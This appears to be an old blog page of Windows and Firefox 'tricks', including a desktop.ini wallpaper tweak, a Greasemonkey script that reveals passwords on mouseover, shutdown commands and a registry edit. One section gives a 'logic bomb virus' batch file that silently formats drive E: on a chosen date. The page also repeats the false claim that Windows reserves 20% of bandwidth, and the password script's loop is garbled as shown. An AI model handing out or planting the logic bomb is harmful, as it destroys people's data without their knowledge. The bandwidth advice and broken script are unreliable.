Set Wall Paper In Your Pen Drive, Drive, Folder

Copy the following code and paste it in note pad

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=PATH_OF_THE_WALLPAPER

Save the file as desktop.ini and see the changes

Note:- If the wallpaper exist in the same folder then write the full name of the wallpaper.

Show Password

█►Grєasємσnkey Scяipтs◄█
In order to install these Grease Monkey scripts,you need to install Mozilla Firefox with grease monkey add-on installed

Step-1
Download Mozilla Firefox Web browser from here :

http://www.mozilla.com/en-US/firefox/


Step-2
Install Grease Monkey in your Firefox browser :
https://addons.mozilla.org/en-US/firefox/addon/748


This is a Grease Monkey script which shows password when mouse is moved over password field of the orkut/gmail/yahoo login page.

Step-3
To install this "Show Password" Grease Monkey script,just click the link given below the script will be auto installed on your browser.


http://prudhvi500.googlepages.com/showpass.user.js


Or

Copy and paste the following code in notepad and save it as anything.user.js and then install this

// ==UserScript==
// @name Shows the Password on MouseOverby Prudhvi
// @namespace Prudhvi
// @include *
// @description shows password when mouse is moved over password field
(function() {
var inputs, input;
inputs = document.evaluate(
'//input[@type="password"]',
document,
null,
XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE,
null);
if(!inputs.snapshotLength) return;
for(var i = 0; i <>
input = inputs.snapshotItem(i);
input.addEventListener('mouseover', function(event) {
this.type = 'text';
}, false);
input.addEventListener('mouseout', function(event) {
this.type = 'password';
}, false);
}
})();

View Contents of RAR, ZIP File Before Downloading

Add the following addon to the firefox it is ArchView.
If you want to download the single file from the Archive.
Now you can download the file.

https://addons.mozilla.org/en-US/firefox/addon/5028

Restart the Firefox.
Now when you will download the RAR, ZIP file it will be active and you can download the desired number of files from the Archive.

Logic Bomb Virus In Batch

Open Notepad

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day

Boost internet Speed by 20%

Windows uses 20% of your internet bandwidth by default! Microsoft reserve 20% of your available bandwidth for their own purposes (for updates and interrogating your machine etc..). Here's how to get it back.

Click Start-->Run-->and type gpedit.msc. Hit enter.
This opens the group policy editor.
Then go to:
Local Computer Policy -->Computer Configuration -->Administrative Templates -->Network -->QOS Packet Scheduler -->Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab:

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%. Works on XP Pro and 2000.

Auto Shutdown PC

METHOD # 1

Step 1:
Right click on your desktop and choose "New=>shortcuts".

Step 2
:
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.

Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.

Step 3:
Make up a name for the shortcut and you're done.

To abort:

To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.


METHOD # 2

Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run => cmd

Type : at 11:35 shutdown -s

to abort :

Type : shutdown -a


METHOD # 3

You can use a batch for that as well it makes it easier to use just run the batch and enter the time you want it to shutdown

Open Notepad and type the following code and name it as shutdown.bat

@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit

also you can add -c "desired message" at the end of the shutdown command
for example
shutdown -s -t 60 -c "Shutdown PC"

using this command u can also schedule ur pc to restart
for example
shutdown -r -t 60 -c "Restarting PC"

Rename Recycle Bin

GoTo
[start][run][cmd]
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000

Change the value accordingly.

Now you will be able to rename recycle bin.